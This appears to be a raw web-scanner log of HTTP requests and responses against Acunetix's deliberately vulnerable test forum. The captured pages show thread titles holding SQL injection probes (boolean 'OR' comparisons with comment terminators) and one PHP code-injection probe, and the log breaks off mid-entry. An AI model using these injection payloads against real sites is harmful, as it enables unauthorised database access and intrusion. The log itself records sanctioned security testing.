<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4133 |
Response Body - size: 4,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>5559996333</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4243 |
Response Body - size: 4,243 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4179 |
Response Body - size: 4,179 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum '.print(md5(31337)).' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/'.print(md5(31337)).' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>'.print(md5(31337)).' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4243 |
Response Body - size: 4,243 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=41 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4237 |
Response Body - size: 4,237 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=42 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4237 |
Response Body - size: 4,237 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=43 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
